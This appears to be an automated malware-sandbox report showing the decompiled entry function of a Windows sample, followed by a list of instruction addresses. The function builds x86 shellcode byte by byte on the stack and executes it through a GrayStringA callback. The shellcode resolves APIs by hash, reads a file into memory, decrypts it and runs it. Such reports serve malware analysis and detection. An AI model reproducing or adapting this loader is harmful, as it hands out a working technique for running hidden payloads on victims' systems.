Instruction Fuzzy Hash: D461A170F00308ABDB51DFA8C880BAEB7B7AF48714F148259E545EB380E7749D41DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 348.9, APIs: 2, Strings: 197, Instructions: 667
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				char _v281;
				char _v282;
				char _v283;
				char _v284;
				char _v285;
				char _v286;
				char _v287;
				char _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				char _v293;
				char _v294;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				char _v302;
				char _v303;
				char _v304;
				char _v305;
				char _v306;
				char _v307;
				char _v308;
				char _v309;
				char _v310;
				char _v311;
				char _v312;
				char _v313;
				char _v314;
				char _v315;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v329;
				char _v330;
				char _v331;
				char _v332;
				char _v333;
				char _v334;
				char _v335;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				char _v362;
				char _v363;
				char _v364;
				char _v365;
				char _v366;
				char _v367;
				char _v368;
				char _v369;
				char _v370;
				char _v371;
				char _v372;
				char _v373;
				char _v374;
				char _v375;
				char _v376;
				char _v377;
				char _v378;
				char _v379;
				char _v380;
				char _v381;
				char _v382;
				char _v383;
				char _v384;
				char _v385;
				char _v386;
				char _v387;
				char _v388;
				char _v389;
				char _v390;
				char _v391;
				char _v392;
				char _v393;
				char _v394;
				char _v395;
				char _v396;
				char _v397;
				char _v398;
				char _v399;
				char _v400;
				char _v401;
				char _v402;
				char _v403;
				char _v404;
				char _v405;
				char _v406;
				char _v407;
				char _v408;
				char _v409;
				char _v410;
				char _v411;
				char _v412;
				char _v413;
				char _v414;
				char _v415;
				char _v416;
				char _v417;
				char _v418;
				char _v419;
				char _v420;
				char _v421;
				char _v422;
				char _v423;
				char _v424;
				char _v425;
				char _v426;
				char _v427;
				char _v428;
				char _v429;
				char _v430;
				char _v431;
				char _v432;
				char _v433;
				char _v434;
				char _v435;
				char _v436;
				char _v437;
				char _v438;
				char _v439;
				char _v440;
				char _v441;
				char _v442;
				char _v443;
				char _v444;
				char _v445;
				char _v446;
				char _v447;
				char _v448;
				char _v449;
				char _v450;
				char _v451;
				char _v452;
				char _v453;
				char _v454;
				char _v455;
				char _v456;
				char _v457;
				char _v458;
				char _v459;
				char _v460;
				char _v461;
				char _v462;
				char _v463;
				char _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v473;
				char _v474;
				char _v475;
				char _v476;
				char _v477;
				char _v478;
				char _v479;
				char _v480;
				char _v481;
				char _v482;
				char _v483;
				char _v484;
				char _v485;
				char _v486;
				char _v487;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v492;
				char _v493;
				char _v494;
				char _v495;
				char _v496;
				char _v497;
				char _v498;
				char _v499;
				char _v500;
				char _v501;
				char _v502;
				char _v503;
				char _v504;
				char _v505;
				char _v506;
				char _v507;
				char _v508;
				char _v509;
				char _v510;
				char _v511;
				char _v512;
				char _v513;
				char _v514;
				char _v515;
				char _v516;
				char _v517;
				char _v518;
				char _v519;
				char _v520;
				char _v521;
				char _v522;
				char _v523;
				char _v524;
				char _v525;
				char _v526;
				char _v527;
				char _v528;
				char _v529;
				char _v530;
				char _v531;
				char _v532;
				char _v533;
				char _v534;
				char _v535;
				char _v536;
				char _v537;
				char _v538;
				char _v539;
				char _v540;
				char _v541;
				char _v542;
				char _v543;
				char _v544;
				char _v545;
				char _v546;
				char _v547;
				char _v548;
				char _v549;
				char _v550;
				char _v551;
				char _v552;
				char _v553;
				char _v554;
				char _v555;
				char _v556;
				char _v557;
				char _v558;
				char _v559;
				char _v560;
				char _v561;
				char _v562;
				char _v563;
				char _v564;
				char _v565;
				char _v566;
				char _v567;
				char _v568;
				char _v569;
				char _v570;
				char _v571;
				char _v572;
				char _v573;
				char _v574;
				char _v575;
				char _v576;
				char _v577;
				char _v578;
				char _v579;
				char _v580;
				char _v581;
				char _v582;
				char _v583;
				char _v584;
				char _v585;
				char _v586;
				char _v587;
				char _v588;
				char _v589;
				char _v590;
				char _v591;
				char _v592;
				char _v593;
				char _v594;
				char _v595;
				char _v596;
				char _v597;
				char _v598;
				char _v599;
				char _v600;
				char _v601;
				char _v602;
				char _v603;
				char _v604;
				char _v605;
				char _v606;
				char _v607;
				char _v608;
				char _v609;
				char _v610;
				char _v611;
				char _v612;
				char _v613;
				char _v614;
				char _v615;
				char _v616;
				char _v617;
				char _v618;
				char _v619;
				char _v620;
				char _v621;
				char _v622;
				char _v623;
				char _v624;
				char _v625;
				char _v626;
				char _v627;
				char _v628;
				char _v629;
				char _v630;
				char _v631;
				char _v632;
				char _v633;
				char _v634;
				char _v635;
				char _v636;
				char _v637;
				char _v638;
				char _v639;
				char _v640;
				char _v641;
				char _v642;
				char _v643;
				char _v644;
				char _v645;
				char _v646;
				char _v647;
				char _v648;
				char _v649;
				char _v650;
				char _v651;
				_Unknown_base(*)() _v652;
				void* _v1652;
				int _t652;

				_v652 = 0xe9;
				_v651 = 0x90;
				_v650 = 0;
				_v649 = 0;
				_v648 = 0;
				_v647 = 0x55;
				_v646 = 0x8b;
				_v645 = 0xec;
				_v644 = 0x56;
				_v643 = 0x8b;
				_v642 = 0x75;
				_v641 = 8;
				_v640 = 0xba;
				_v639 = 0xef;
				_v638 = 0x12;
				_v637 = 0;
				_v636 = 0;
				_v635 = 0x57;
				_v634 = 0xeb;
				_v633 = 0xe;
				_v632 = 0x8b;
				_v631 = 0xca;
				_v630 = 0xd1;
				_v629 = 0xe8;
				_v628 = 0xc1;
				_v627 = 0xe1;
				_v626 = 7;
				_v625 = 0x46;
				_v624 = 0xb;
				_v623 = 0xc8;
				_v622 = 3;
				_v621 = 0xcf;
				_v620 = 3;
				_v619 = 0xd1;
				_v618 = 0xf;
				_v617 = 0xbe;
				_v616 = 0x3e;
				_v615 = 0x8b;
				_v614 = 0xc2;
				_v613 = 0x85;
				_v612 = 0xff;
				_v611 = 0x75;
				_v610 = 0xe9;
				_v609 = 0x5f;
				_v608 = 0x5e;
				_v607 = 0x5d;
				_v606 = 0xc3;
				_v605 = 0x55;
				_v604 = 0x8b;
				_v603 = 0xec;
				_v602 = 0x51;
				_v601 = 0x51;
				_v600 = 0x53;
				_v599 = 0x56;
				_v598 = 0x57;
				_v597 = 0x8b;
				_v596 = 0x7d;
				_v595 = 8;
				_v594 = 0x33;
				_v593 = 0xf6;
				_v592 = 0x8b;
				_v591 = 0x47;
				_v590 = 0x3c;
				_v589 = 0x8b;
				_v588 = 0x44;
				_v587 = 0x38;
				_v586 = 0x78;
				_v585 = 3;
				_v584 = 0xc7;
				_v583 = 0x8b;
				_v582 = 0x50;
				_v581 = 0x20;
				_v580 = 0x8b;
				_v579 = 0x58;
				_v578 = 0x1c;
				_v577 = 3;
				_v576 = 0xd7;
				_v575 = 0x8b;
				_v574 = 0x48;
				_v573 = 0x24;
				_v572 = 3;
				_v571 = 0xdf;
				_v570 = 0x8b;
				_v569 = 0x40;
				_v568 = 0x18;
				_v567 = 3;
				_v566 = 0xcf;
				_v565 = 0x89;
				_v564 = 0x55;
				_v563 = 0xfc;
				_v562 = 0x89;
				_v561 = 0x4d;
				_v560 = 0xf8;
				_v559 = 0x89;
				_v558 = 0x45;
				_v557 = 8;
				_v556 = 0x85;
				_v555 = 0xc0;
				_v554 = 0x74;
				_v553 = 0x1a;
				_v552 = 0x8b;
				_v551 = 4;
				_v550 = 0xb2;
				_v549 = 3;
				_v548 = 0xc7;
				_v547 = 0x50;
				_v546 = 0xe8;
				_v545 = 0x96;
				_v544 = 0xff;
				_v543 = 0xff;
				_v542 = 0xff;
				_v541 = 0x59;
				_v540 = 0x3b;
				_v539 = 0x45;
				_v538 = 0xc;
				_v537 = 0x74;
				_v536 = 0x12;
				_v535 = 0x8b;
				_v534 = 0x55;
				_v533 = 0xfc;
				_v532 = 0x46;
				_v531 = 0x3b;
				_v530 = 0x75;
				_v529 = 8;
				_v528 = 0x72;
				_v527 = 0xe6;
				_v526 = 0x33;
				_v525 = 0xc0;
				_v524 = 0x5f;
				_v523 = 0x5e;
				_v522 = 0x5b;
				_v521 = 0x8b;
				_v520 = 0xe5;
				_v519 = 0x5d;
				_v518 = 0xc3;
				_v517 = 0x8b;
				_v516 = 0x45;
				_v515 = 0xf8;
				_v514 = 0xf;
				_v513 = 0xb7;
				_v512 = 4;
				_v511 = 0x70;
				_v510 = 0x8b;
				_v509 = 4;
				_v508 = 0x83;
				_v507 = 3;
				_v506 = 0xc7;
				_v505 = 0xeb;
				_v504 = 0xeb;
				_v503 = 0x55;
				_v502 = 0x8b;
				_v501 = 0xec;
				_v500 = 0x81;
				_v499 = 0xec;
				_v498 = 0x24;
				_v497 = 4;
				_v496 = 0;
				_v495 = 0;
				_v494 = 0x53;
				_v493 = 0x56;
				_v492 = 0x57;
				_v491 = 0x64;
				_v490 = 0xa1;
				_v489 = 0x30;
				_v488 = 0;
				_v487 = 0;
				_v486 = 0;
				_v485 = 0x8b;
				_v484 = 0x40;
				_v483 = 0xc;
				_v482 = 0x8b;
				_v481 = 0x40;
				_v480 = 0xc;
				_v479 = 0x8b;
				_v478 = 0;
				_v477 = 0x8b;
				_v476 = 0;
				_v475 = 0x8b;
				_v474 = 0x40;
				_v473 = 0x18;
				_v472 = 0x8b;
				_v471 = 0xf0;
				_v470 = 0x33;
				_v469 = 0xdb;
				_v468 = 0x68;
				_v467 = 0x40;
				_v466 = 0xd1;
				_v465 = 0xf2;
				_v464 = 0x3d;
				_v463 = 0x56;
				_v462 = 0x89;
				_v461 = 0x5d;
				_v460 = 0xec;
				_v459 = 0xe8;
				_v458 = 0x69;
				_v457 = 0xff;
				_v456 = 0xff;
				_v455 = 0xff;
				_v454 = 0x68;
				_v453 = 0x5b;
				_v452 = 0xd0;
				_v451 = 0xbb;
				_v450 = 0x76;
				_v449 = 0x56;
				_v448 = 0x8b;
				_v447 = 0xf8;
				_v446 = 0xe8;
				_v445 = 0x5c;
				_v444 = 0xff;
				_v443 = 0xff;
				_v442 = 0xff;
				_v441 = 0x68;
				_v440 = 0x81;
				_v439 = 9;
				_v438 = 0xb5;
				_v437 = 0xfb;
				_v436 = 0x56;
				_v435 = 0x89;
				_v434 = 0x45;
				_v433 = 0xf8;
				_v432 = 0xe8;
				_v431 = 0x4e;
				_v430 = 0xff;
				_v429 = 0xff;
				_v428 = 0xff;
				_v427 = 0x68;
				_v426 = 0xf8;
				_v425 = 0xc6;
				_v424 = 0xf7;
				_v423 = 0xad;
				_v422 = 0x56;
				_v421 = 0x89;
				_v420 = 0x45;
				_v419 = 0xfc;
				_v418 = 0xe8;
				_v417 = 0x40;
				_v416 = 0xff;
				_v415 = 0xff;
				_v414 = 0xff;
				_v413 = 0x68;
				_v412 = 0x61;
				_v411 = 0x58;
				_v410 = 0x77;
				_v409 = 0x7c;
				_v408 = 0x56;
				_v407 = 0x89;
				_v406 = 0x45;
				_v405 = 0xf4;
				_v404 = 0xe8;
				_v403 = 0x32;
				_v402 = 0xff;
				_v401 = 0xff;
				_v400 = 0xff;
				_v399 = 0x83;
				_v398 = 0xc4;
				_v397 = 0x28;
				_v396 = 0x89;
				_v395 = 0x45;
				_v394 = 0xf0;
				_v393 = 0x8d;
				_v392 = 0x85;
				_v391 = 0xdc;
				_v390 = 0xfb;
				_v389 = 0xff;
				_v388 = 0xff;
				_v387 = 0x68;
				_v386 = 3;
				_v385 = 1;
				_v384 = 0;
				_v383 = 0;
				_v382 = 0x50;
				_v381 = 0x53;
				_v380 = 0xff;
				_v379 = 0xd7;
				_v378 = 0x85;
				_v377 = 0xc0;
				_v376 = 0xf;
				_v375 = 0x84;
				_v374 = 0x41;
				_v373 = 1;
				_v372 = 0;
				_v371 = 0;
				_v370 = 0x53;
				_v369 = 0x68;
				_v368 = 0x80;
				_v367 = 0;
				_v366 = 0;
				_v365 = 0;
				_v364 = 0x6a;
				_v363 = 3;
				_v362 = 0x53;
				_v361 = 0x6a;
				_v360 = 7;
				_v359 = 0x68;
				_v358 = 0;
				_v357 = 0;
				_v356 = 0;
				_v355 = 0x80;
				_v354 = 0x8d;
				_v353 = 0x85;
				_v352 = 0xdc;
				_v351 = 0xfb;
				_v350 = 0xff;
				_v349 = 0xff;
				_v348 = 0x50;
				_v347 = 0xff;
				_v346 = 0x55;
				_v345 = 0xfc;
				_v344 = 0x89;
				_v343 = 0x45;
				_v342 = 0xfc;
				_v341 = 0x83;
				_v340 = 0xf8;
				_v339 = 0xff;
				_v338 = 0xf;
				_v337 = 0x84;
				_v336 = 0x1b;
				_v335 = 1;
				_v334 = 0;
				_v333 = 0;
				_v332 = 0x53;
				_v331 = 0x50;
				_v330 = 0xff;
				_v329 = 0x55;
				_v328 = 0xf4;
				_v327 = 0x8b;
				_v326 = 0xf8;
				_v325 = 0x83;
				_v324 = 0xff;
				_v323 = 0xff;
				_v322 = 0xf;
				_v321 = 0x84;
				_v320 = 0xb;
				_v319 = 1;
				_v318 = 0;
				_v317 = 0;
				_v316 = 0x6a;
				_v315 = 4;
				_v314 = 0x68;
				_v313 = 0;
				_v312 = 0x30;
				_v311 = 0;
				_v310 = 0;
				_v309 = 0x57;
				_v308 = 0x53;
				_v307 = 0xff;
				_v306 = 0x55;
				_v305 = 0xf8;
				_v304 = 0x8b;
				_v303 = 0xf0;
				_v302 = 0x85;
				_v301 = 0xf6;
				_v300 = 0xf;
				_v299 = 0x84;
				_v298 = 0xf5;
				_v297 = 0;
				_v296 = 0;
				_v295 = 0;
				_v294 = 0x53;
				_v293 = 0x8d;
				_v292 = 0x45;
				_v291 = 0xec;
				_v290 = 0x50;
				_v289 = 0x57;
				_v288 = 0x56;
				_v287 = 0xff;
				_v286 = 0x75;
				_v285 = 0xfc;
				_v284 = 0xff;
				_v283 = 0x55;
				_v282 = 0xf0;
				_v281 = 0x85;
				_v280 = 0xc0;
				_v279 = 0xf;
				_v278 = 0x84;
				_v277 = 0xe0;
				_v276 = 0;
				_v275 = 0;
				_v274 = 0;
				_v273 = 0x8b;
				_v272 = 0x46;
				_v271 = 0x3c;
				_v270 = 3;
				_v269 = 0xc6;
				_v268 = 0xf;
				_v267 = 0xb7;
				_v266 = 0x48;
				_v265 = 6;
				_v264 = 0x8b;
				_v263 = 0x50;
				_v262 = 0x54;
				_v261 = 0x89;
				_v260 = 0x55;
				_v259 = 0xfc;
				_v258 = 0x85;
				_v257 = 0xc9;
				_v256 = 0x74;
				_v255 = 0x19;
				_v254 = 0xf;
				_v253 = 0xb7;
				_v252 = 0x50;
				_v251 = 0x14;
				_v250 = 0x83;
				_v249 = 0xc2;
				_v248 = 0x28;
				_v247 = 3;
				_v246 = 0xc2;
				_v245 = 0x8b;
				_v244 = 0x55;
				_v243 = 0xfc;
				_v242 = 3;
				_v241 = 0x10;
				_v240 = 0x8d;
				_v239 = 0x40;
				_v238 = 0x28;
				_v237 = 0x83;
				_v236 = 0xe9;
				_v235 = 1;
				_v234 = 0x75;
				_v233 = 0xf6;
				_v232 = 0x89;
				_v231 = 0x55;
				_v230 = 0xfc;
				_v229 = 0x6a;
				_v228 = 0x40;
				_v227 = 0xb8;
				_v226 = 0x8f;
				_v225 = 0x15;
				_v224 = 0;
				_v223 = 0;
				_v222 = 0x2b;
				_v221 = 0xfa;
				_v220 = 0x68;
				_v219 = 0;
				_v218 = 0x30;
				_v217 = 0;
				_v216 = 0;
				_v215 = 0x50;
				_v214 = 0x53;
				_v213 = 0x2b;
				_v212 = 0xf8;
				_v211 = 0xff;
				_v210 = 0x55;
				_v209 = 0xf8;
				_v208 = 3;
				_v207 = 0x75;
				_v206 = 0xfc;
				_v205 = 0x68;
				_v204 = 0x8f;
				_v203 = 0x15;
				_v202 = 0;
				_v201 = 0;
				_v200 = 0x56;
				_v199 = 0x50;
				_v198 = 0x89;
				_v197 = 0x45;
				_v196 = 0xf0;
				_v195 = 0xe8;
				_v194 = 0x94;
				_v193 = 0;
				_v192 = 0;
				_v191 = 0;
				_v190 = 0x83;
				_v189 = 0xc4;
				_v188 = 0xc;
				_v187 = 0x6a;
				_v186 = 0x40;
				_v185 = 0x68;
				_v184 = 0;
				_v183 = 0x30;
				_v182 = 0;
				_v181 = 0;
				_v180 = 0x57;
				_v179 = 0x53;
				_v178 = 0xff;
				_v177 = 0x55;
				_v176 = 0xf8;
				_v175 = 0x57;
				_v174 = 0x8d;
				_v173 = 0x8e;
				_v172 = 0x8f;
				_v171 = 0x15;
				_v170 = 0;
				_v169 = 0;
				_v168 = 0x89;
				_v167 = 0x45;
				_v166 = 0xf4;
				_v165 = 0x51;
				_v164 = 0x50;
				_v163 = 0xe8;
				_v162 = 0x74;
				_v161 = 0;
				_v160 = 0;
				_v159 = 0;
				_v158 = 0x8b;
				_v157 = 0x55;
				_v156 = 0xf0;
				_v155 = 0x83;
				_v154 = 0xc4;
				_v153 = 0xc;
				_v152 = 0x8a;
				_v151 = 0xc;
				_v150 = 0x13;
				_v149 = 0x8a;
				_v148 = 0xc3;
				_v147 = 0xc0;
				_v146 = 0xc9;
				_v145 = 3;
				_v144 = 2;
				_v143 = 0xc0;
				_v142 = 0xfe;
				_v141 = 0xc1;
				_v140 = 0x32;
				_v139 = 0xcb;
				_v138 = 0x80;
				_v137 = 0xc1;
				_v136 = 0x74;
				_v135 = 0x32;
				_v134 = 0xcb;
				_v133 = 0x80;
				_v132 = 0xe9;
				_v131 = 0x40;
				_v130 = 0x80;
				_v129 = 0xf1;
				_v128 = 0x27;
				_v127 = 0x80;
				_v126 = 0xe9;
				_v125 = 0x3b;
				_v124 = 0x80;
				_v123 = 0xf1;
				_v122 = 0x45;
				_v121 = 0x80;
				_v120 = 0xe9;
				_v119 = 0x43;
				_v118 = 2;
				_v117 = 0xc8;
				_v116 = 0x32;
				_v115 = 0xcb;
				_v114 = 2;
				_v113 = 0xcb;
				_v112 = 0xc0;
				_v111 = 0xc1;
				_v110 = 3;
				_v109 = 0xf6;
				_v108 = 0xd1;
				_v107 = 0x2a;
				_v106 = 0xcb;
				_v105 = 0x80;
				_v104 = 0xf1;
				_v103 = 0xfe;
				_v102 = 2;
				_v101 = 0xcb;
				_v100 = 0x80;
				_v99 = 0xf1;
				_v98 = 0xdb;
				_v97 = 0xf6;
				_v96 = 0xd1;
				_v95 = 0x80;
				_v94 = 0xc1;
				_v93 = 0x78;
				_v92 = 0x80;
				_v91 = 0xf1;
				_v90 = 7;
				_v89 = 0x80;
				_v88 = 0xe9;
				_v87 = 0x2e;
				_v86 = 0xf6;
				_v85 = 0xd1;
				_v84 = 0x80;
				_v83 = 0xc1;
				_v82 = 0x73;
				_v81 = 0x80;
				_v80 = 0xf1;
				_v79 = 0x14;
				_v78 = 0x2a;
				_v77 = 0xcb;
				_v76 = 0x80;
				_v75 = 0xf1;
				_v74 = 0x70;
				_v73 = 0x2a;
				_v72 = 0xcb;
				_v71 = 0x32;
				_v70 = 0xcb;
				_v69 = 0x2a;
				_v68 = 0xcb;
				_v67 = 0x88;
				_v66 = 0xc;
				_v65 = 0x13;
				_v64 = 0x43;
				_v63 = 0x81;
				_v62 = 0xfb;
				_v61 = 0x8f;
				_v60 = 0x15;
				_v59 = 0;
				_v58 = 0;
				_v57 = 0x72;
				_v56 = 0x9f;
				_v55 = 0xff;
				_v54 = 0x75;
				_v53 = 0xf4;
				_v52 = 0xff;
				_v51 = 0xd2;
				_v50 = 0x59;
				_v49 = 0x5f;
				_v48 = 0x5e;
				_v47 = 0x5b;
				_v46 = 0x8b;
				_v45 = 0xe5;
				_v44 = 0x5d;
				_v43 = 0xc3;
				_v42 = 0x55;
				_v41 = 0x8b;
				_v40 = 0xec;
				_v39 = 0x8b;
				_v38 = 0x55;
				_v37 = 0x10;
				_v36 = 0x85;
				_v35 = 0xd2;
				_v34 = 0x74;
				_v33 = 0x15;
				_v32 = 0x8b;
				_v31 = 0x4d;
				_v30 = 8;
				_v29 = 0x56;
				_v28 = 0x8b;
				_v27 = 0x75;
				_v26 = 0xc;
				_v25 = 0x2b;
				_v24 = 0xf1;
				_v23 = 0x8a;
				_v22 = 4;
				_v21 = 0xe;
				_v20 = 0x88;
				_v19 = 1;
				_v18 = 0x41;
				_v17 = 0x83;
				_v16 = 0xea;
				_v15 = 1;
				_v14 = 0x75;
				_v13 = 0xf5;
				_v12 = 0x5e;
				_v11 = 0x5d;
				_v10 = 0xc3;
				_v9 = 0;
				_v8 = 0;
				_v7 = 0;
				_v6 = 0;
				_t652 = GrayStringA(GetDC(0), 0,  &_v652,  &_v1652, 0, 0, 0, 0, 0); // executed
				return _t652;
			}

0x00401009
0x00401010
0x00401017
0x0040101e
0x00401025
0x0040102c
0x00401033
0x0040103a
0x00401041
0x00401048
0x0040104f
0x00401056
0x0040105d
0x00401064
0x0040106b
0x00401072
0x00401079
0x00401080
0x00401087
0x0040108e
0x00401095
0x0040109c
0x004010a3
0x004010aa
0x004010b1
0x004010b8
0x004010bf
0x004010c6
0x004010cd
0x004010d4
0x004010db
0x004010e2
0x004010e9
0x004010f0
0x004010f7
0x004010fe
0x00401105
0x0040110c
0x00401113
0x0040111a
0x00401121
0x00401128
0x0040112f
0x00401136
0x0040113d
0x00401144
0x0040114b
0x00401152
0x00401159
0x00401160
0x00401167
0x0040116e
0x00401175
0x0040117c
0x00401183
0x0040118a
0x00401191
0x00401198
0x0040119f
0x004011a6
0x004011ad
0x004011b4
0x004011bb
0x004011c2
0x004011c9
0x004011d0
0x004011d7
0x004011de
0x004011e5
0x004011ec
0x004011f3
0x004011fa
0x00401201
0x00401208
0x0040120f
0x00401216
0x0040121d
0x00401224
0x0040122b
0x00401232
0x00401239
0x00401240
0x00401247
0x0040124e
0x00401255
0x0040125c
0x00401263
0x0040126a
0x00401271
0x00401278
0x0040127f
0x00401286
0x0040128d
0x00401294
0x0040129b
0x004012a2
0x004012a9
0x004012b0
0x004012b7
0x004012be
0x004012c5
0x004012cc
0x004012d3
0x004012da
0x004012e1
0x004012e8
0x004012ef
0x004012f6
0x004012fd
0x00401304
0x0040130b
0x00401312
0x00401319
0x00401320
0x00401327
0x0040132e
0x00401335
0x0040133c
0x00401343
0x0040134a
0x00401351
0x00401358
0x0040135f
0x00401366
0x0040136d
0x00401374
0x0040137b
0x00401382
0x00401389
0x00401390
0x00401397
0x0040139e
0x004013a5
0x004013ac
0x004013b3
0x004013ba
0x004013c1
0x004013c8
0x004013cf
0x004013d6
0x004013dd
0x004013e4
0x004013eb
0x004013f2
0x004013f9
0x00401400
0x00401407
0x0040140e
0x00401415
0x0040141c
0x00401423
0x0040142a
0x00401431
0x00401438
0x0040143f
0x00401446
0x0040144d
0x00401454
0x0040145b
0x00401462
0x00401469
0x00401470
0x00401477
0x0040147e
0x00401485
0x0040148c
0x00401493
0x0040149a
0x004014a1
0x004014a8
0x004014af
0x004014b6
0x004014bd
0x004014c4
0x004014cb
0x004014d2
0x004014d9
0x004014e0
0x004014e7
0x004014ee
0x004014f5
0x004014fc
0x00401503
0x0040150a
0x00401511
0x00401518
0x0040151f
0x00401526
0x0040152d
0x00401534
0x0040153b
0x00401542
0x00401549
0x00401550
0x00401557
0x0040155e
0x00401565
0x0040156c
0x00401573
0x0040157a
0x00401581
0x00401588
0x0040158f
0x00401596
0x0040159d
0x004015a4
0x004015ab
0x004015b2
0x004015b9
0x004015c0
0x004015c7
0x004015ce
0x004015d5
0x004015dc
0x004015e3
0x004015ea
0x004015f1
0x004015f8
0x004015ff
0x00401606
0x0040160d
0x00401614
0x0040161b
0x00401622
0x00401629
0x00401630
0x00401637
0x0040163e
0x00401645
0x0040164c
0x00401653
0x0040165a
0x00401661
0x00401668
0x0040166f
0x00401676
0x0040167d
0x00401684
0x0040168b
0x00401692
0x00401699
0x004016a0
0x004016a7
0x004016ae
0x004016b5
0x004016bc
0x004016c3
0x004016ca
0x004016d1
0x004016d8
0x004016df
0x004016e6
0x004016ed
0x004016f4
0x004016fb
0x00401702
0x00401709
0x00401710
0x00401717
0x0040171e
0x00401725
0x0040172c
0x00401733
0x0040173a
0x00401741
0x00401748
0x0040174f
0x00401756
0x0040175d
0x00401764
0x0040176b
0x00401772
0x00401779
0x00401780
0x00401787
0x0040178e
0x00401795
0x0040179c
0x004017a3
0x004017aa
0x004017b1
0x004017b8
0x004017bf
0x004017c6
0x004017cd
0x004017d4
0x004017db
0x004017e2
0x004017e9
0x004017f0
0x004017f7
0x004017fe
0x00401805
0x0040180c
0x00401813
0x0040181a
0x00401821
0x00401828
0x0040182f
0x00401836
0x0040183d
0x00401844
0x0040184b
0x00401852
0x00401859
0x00401860
0x00401867
0x0040186e
0x00401875
0x0040187c
0x00401883
0x0040188a
0x00401891
0x00401898
0x0040189f
0x004018a6
0x004018ad
0x004018b4
0x004018bb
0x004018c2
0x004018c9
0x004018d0
0x004018d7
0x004018de
0x004018e5
0x004018ec
0x004018f3
0x004018fa
0x00401901
0x00401908
0x0040190f
0x00401916
0x0040191d
0x00401924
0x0040192b
0x00401932
0x00401939
0x00401940
0x00401947
0x0040194e
0x00401955
0x0040195c
0x00401963
0x0040196a
0x00401971
0x00401978
0x0040197f
0x00401986
0x0040198d
0x00401994
0x0040199b
0x004019a2
0x004019a9
0x004019b0
0x004019b7
0x004019be
0x004019c5
0x004019cc
0x004019d3
0x004019da
0x004019e1
0x004019e8
0x004019ef
0x004019f6
0x004019fd
0x00401a04
0x00401a0b
